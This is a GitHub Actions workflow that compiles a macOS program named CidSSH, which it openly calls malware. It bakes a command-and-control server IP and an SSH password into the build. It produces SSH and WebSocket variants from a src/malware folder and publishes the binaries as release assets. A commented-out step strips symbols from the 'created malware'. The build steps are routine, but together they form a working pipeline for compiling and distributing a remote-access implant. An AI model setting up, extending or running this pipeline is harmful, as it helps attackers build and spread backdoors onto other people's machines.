name: Build for macOS
on: 
    push:
    pull_request:
    release:
      types: # This configuration does not affect the page_build event above
        - created

# Hardcode C2_IP and C2 SSH password so the CI builds everything for you
env:
  C2_IP: ""
  PASSWORD_AUTH: ""

jobs:
    build:
        #if: github.event_name == 'push' && contains(toJson(github.event.commits), '***NO_CI***') == false && contains(toJson(github.event.commits), '[ci skip]') == false && contains(toJson(github.event.commits), '[skip ci]') == false
        runs-on: macos-latest
        steps:
            - uses: haya14busa/action-cond@v1
              id: c2IPCondval
              with:
                cond: "${{ env.C2_IP == '' }}"
                if_true: ""
                if_false: "-DC2_IP=${{ env.C2_IP }}"

            - uses: haya14busa/action-cond@v1
              id: passwordCondval
              with:
                cond: "${{ env.PASSWORD_AUTH == '' }}"
                if_true: ""
                if_false: "-DPASSWORD_AUTH=${{ env.PASSWORD_AUTH }}"
              
            - uses: actions/checkout@v1
              with:
                  submodules: true
            
            - name: Install OpenSSL/Boost from Homebrew
              run: |
                  brew install ninja openssl pkg-config cmake boost git cmake
            
            - name: Install libssh
              run: |
                  echo "set(VCPKG_BUILD_TYPE release)" >> $VCPKG_INSTALLATION_ROOT/triplets/x64-linux.cmake
                  VCPKG_FORCE_SYSTEM_BINARIES=1 VCPKG_BUILD_TYPE=release vcpkg install libssh[core,openssl] --triplet x64-osx
            
            - name: Create build directory
              run: |
                  export LDFLAGS="-L/usr/local/opt/openssl/lib"
                  export CPPFLAGS="-I/usr/local/opt/openssl/include"
                  export PKG_CONFIG_PATH="/usr/local/opt/openssl/lib/pkgconfig"
                  cmake --version
                  cmake -S . -B build -DWITH_WEBSOCKETS=OFF ${{ steps.c2IPCondval.outputs.value }} ${{ steps.passwordCondval.outputs.value }} -DCMAKE_TOOLCHAIN_FILE="/tmp/vcpkg/scripts/buildsystems/vcpkg.cmake" -DCMAKE_BUILD_TYPE=Release
            
            - name: Build CidSSH in SSH mode
              run: |
                  export LDFLAGS="-L/usr/local/opt/openssl/lib"
                  export CPPFLAGS="-I/usr/local/opt/openssl/include"
                  export PKG_CONFIG_PATH="/usr/local/opt/openssl/lib/pkgconfig"
                  cmake --build build --config Release
                  
            - name: Create build directory
              run: |
                  export LDFLAGS="-L/usr/local/opt/openssl/lib"
                  export CPPFLAGS="-I/usr/local/opt/openssl/include"
                  export PKG_CONFIG_PATH="/usr/local/opt/openssl/lib/pkgconfig"
                  cmake --version
                  cmake -S . -B build_ws -DWITH_WEBSOCKETS=ON -DCMAKE_TOOLCHAIN_FILE="/tmp/vcpkg/scripts/buildsystems/vcpkg.cmake" -DCMAKE_BUILD_TYPE=Release
            
            - name: Build CidSSH in Websocket mode
              run: |
                  export LDFLAGS="-L/usr/local/opt/openssl/lib"
                  export CPPFLAGS="-I/usr/local/opt/openssl/include"
                  export PKG_CONFIG_PATH="/usr/local/opt/openssl/lib/pkgconfig"
                  cmake --build build_ws --config Release
            
            #- name: Strip symbols from created malware
            #  run: |
            #      strip -s build/src/malware/CidSSH
            #      strip -s build_ws/src/malware/CidSSH
            
            - uses: actions/upload-artifact@master
              with:
                  name: CidSSH_osx_ssh_x64
                  path: build/src/malware/CidSSH                 
            - uses: actions/upload-artifact@master
              with:
                  name: CidSSH_osx_ws_x64
                  path: build_ws/src/malware/CidSSH

    release:
        runs-on: ubuntu-latest
        if: github.event_name == 'release'
        needs: build
        steps:
            - name: Download CidSSH ssh version
              uses: actions/download-artifact@v1
              with:
                  name: CidSSH_osx_ssh_x64
            - name: Upload ssh arifact to Github release
              uses: actions/upload-release-asset@v1
              env:
                    GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
              with:
                  upload_url: ${{ github.event.release.upload_url }}
                  asset_path: CidSSH_osx_ssh_x64/CidSSH
                  asset_name: CidSSH_osx_ssh_x64
                  asset_content_type: application/octet-stream
                  
            - name: Download CidSSH ws version
              uses: actions/download-artifact@v1
              with:
                  name: CidSSH_osx_ws_x64
            - name: Upload ws arifact to Github release
              uses: actions/upload-release-asset@v1
              env:
                    GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
              with:
                  upload_url: ${{ github.event.release.upload_url }}
                  asset_path: CidSSH_osx_ws_x64/CidSSH
                  asset_name: CidSSH_osx_ws_x64
                  asset_content_type: application/octet-stream      